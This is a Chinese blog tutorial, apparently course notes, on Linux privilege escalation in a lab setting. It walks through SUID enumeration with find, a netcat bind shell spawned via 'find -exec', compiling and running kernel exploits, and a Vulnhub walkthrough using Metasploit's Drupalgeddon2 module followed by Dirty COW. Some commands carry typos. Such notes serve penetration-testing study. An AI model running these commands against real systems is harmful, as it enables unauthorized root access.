权限提升-Linux脏牛内核漏洞&SUID&信息收集

linux提权一般放置tmp目录,临时目录,一般可读写,可执行.sh是linux可执行文件
运行:./linux.x.x.x.x.sh
perl对应的是 pl
有本地用户,就本地提权,没有就通过MSF提权
#案例1.Linux提权自动化脚本利用-4个脚本
两个信息收集:LinEnum,linuxprivchecker
为后续的提权方法提供基础,
两个漏洞探针:linux-exploit-suggester linux-exploit-suggester2


#案例2.LInux提权SUID配合脚本演示-Web
漏洞成因:chmod u+s 给予了 suid u-s删除了suid
使程序在运行过程中受到lsuid root权限的执行过程导致
(普通用户执行,实际是以root权限执行)
提权过程:探针是否有SUID(手工或脚本)-特定SUID利用-利用吃瓜-GG

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

参考利用:https://pentestlab.blog/2017/09/25/suid-executables/
touch xiaodi
find xiaodi -exec whoami ;
ind xiaodi -exec netcat -lvp 5555 -e /bin/sh ;
netcat xx.xx.xx.xx 5555
0x01.得到webshell权限
image.png

gcc 45010.c -o 45010
chmod +x 45010
./45010
id

#案例4.LInux提权脏牛内核漏洞演示-Vulnhub
内核提权整个过程:(linux-exploit-suggester 获取信息哦)
vulnhub 靶机-探针目标-CMS 漏洞利用-脚本探针提权漏洞-利用内核提权-GG 内核漏洞
提权过程:寻可用-下 exp-上/tmp-编译 exp-执行(无权限用 chmod)

nmap 192.168.76.0/24
nmap -p1-65535 192.168.76.141
search drupal
use exploit/unix/webapp/drupal_drupalgeddon2
set lhost 192.168.76.141
set lport 1898
set target 0
run
upload /tmp/40837.cpp /tmp/40837.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
python -c 'import pty; pty.spawn("/bin/bash")'	#利用python生成可交互式shell
./dcow

脏牛漏洞:
https://paper.seebug.org/483/#_4
ps://paper.seebug.org/483/#_4)

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

雨雾_雨屋

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值